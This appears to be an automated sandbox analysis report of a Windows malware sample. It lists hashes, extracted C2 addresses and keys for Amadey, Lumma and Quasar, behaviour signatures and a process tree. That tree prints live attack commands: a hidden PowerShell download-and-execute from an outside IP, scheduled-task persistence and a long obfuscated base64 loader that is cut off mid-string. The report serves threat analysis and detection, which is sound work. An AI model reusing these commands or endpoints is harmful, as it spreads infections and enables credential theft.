Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 02:08

General

  • Target

    2025-04-02_26a2fd9d127b3ef9aad0b6393f45363d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    26a2fd9d127b3ef9aad0b6393f45363d

  • SHA1

    38e1e683f900d5427b83f142bf5fa2b0dbd549e6

  • SHA256

    ba60db902564e099cdcb51f529e5e643e3221b2d51e63122fd1d659fcb32ee22

  • SHA512

    eb2f411e8948d58206bc15ad5db52c1562e8b0b4f7c369051fad30610038b4c9bf0ca3bf7ba9db09630e8bda0236f61408972d11f45e39fcd33224f0ff9200ab

  • SSDEEP

    24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a0fu:TTvC/MTQYxsWR7a0f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://navstarx.shop/FoaJSi

https://dmetalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://-targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://targett.top/dsANGt

https://hadvennture.top/GKsiio

https://anavstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

https://6jmetalsyo.digital/opsa

https://qspacedbv.world/EKdlsk

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes
  • install_dir

    52907c9546

  • install_file

    tgvazx.exe

  • strings_key

    cc9d94f7503394295f4824f8cfd50608

  • url_paths

    /Di0Her478/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 27 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Deletes itself 1 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 54 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads ssh keys stored on the system 2 TTPs

    Tries to access SSH used by SSH programs.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 57 IoCs
  • Enumerates processes with tasklist 1 TTPs 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 20 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 24 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 31 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 64 IoCs
  • Modifies data under HKEY_USERS 61 IoCs
  • Modifies registry class 4 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2952
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:4688
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:5916
    • C:\Users\Admin\AppData\Local\Temp\2025-04-02_26a2fd9d127b3ef9aad0b6393f45363d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-02_26a2fd9d127b3ef9aad0b6393f45363d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:976
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn YcvHCmajOuQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\8CYs29WMX.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5328
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn YcvHCmajOuQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\8CYs29WMX.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:3876
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\8CYs29WMX.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3672
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'TMP1UZWN00H065GLTL0P1TGDV3F33NFE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:6104
          • C:\Users\Admin\AppData\Local\TempTMP1UZWN00H065GLTL0P1TGDV3F33NFE.EXE
            "C:\Users\Admin\AppData\Local\TempTMP1UZWN00H065GLTL0P1TGDV3F33NFE.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:836
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1464
              • C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe
                "C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2920
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                    PID:3380
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1820
                • C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe
                  "C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1640
                  • C:\Users\Admin\Abspawnhlp.exe
                    "C:\Users\Admin\Abspawnhlp.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:2040
                    • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      8⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:5756
                      • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                        9⤵
                        • Downloads MZ/PE file
                        • Checks computer location settings
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Modifies registry class
                        PID:3964
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet
                          10⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5740
                        • C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe
                          "C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"
                          10⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:2148
                          • C:\Users\Admin\Abspawnhlp.exe
                            "C:\Users\Admin\Abspawnhlp.exe"
                            11⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: MapViewOfSection
                            PID:5636
                            • C:\Users\Admin\Abspawnhlp.exe
                              C:\Users\Admin\Abspawnhlp.exe
                              12⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:4988
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\SysWOW64\cmd.exe
                              12⤵
                              • System Location Discovery: System Language Discovery
                              PID:4936
                        • C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe
                          "C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"
                          10⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          PID:5788
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:3992
                        • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                          "C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"
                          10⤵
                          • Executes dropped EXE
                          PID:6104
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 80
                            11⤵
                            • Program crash
                            PID:4836
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet
                          10⤵
                            PID:4876
                          • C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:5668
                          • C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"
                            10⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:1964
                            • C:\Users\Admin\CamMenuMaker.exe
                              "C:\Users\Admin\CamMenuMaker.exe"
                              11⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              PID:4000
                              • C:\Users\Admin\CamMenuMaker.exe
                                C:\Users\Admin\CamMenuMaker.exe
                                12⤵
                                • Loads dropped DLL
                                • Suspicious behavior: AddClipboardFormatListener
                                PID:8020
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==
                                  13⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  PID:11908
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\SysWOW64\cmd.exe
                                12⤵
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:4992
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\SysWOW64\cmd.exe
                          9⤵
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:376
                  • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
                    "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:3828
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                        PID:5952
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5992
                    • C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
                      "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:1296
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5228
                    • C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe
                      "C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4704
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:900
                    • C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe
                      "C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:628
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2176
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:5664
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:2764
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTs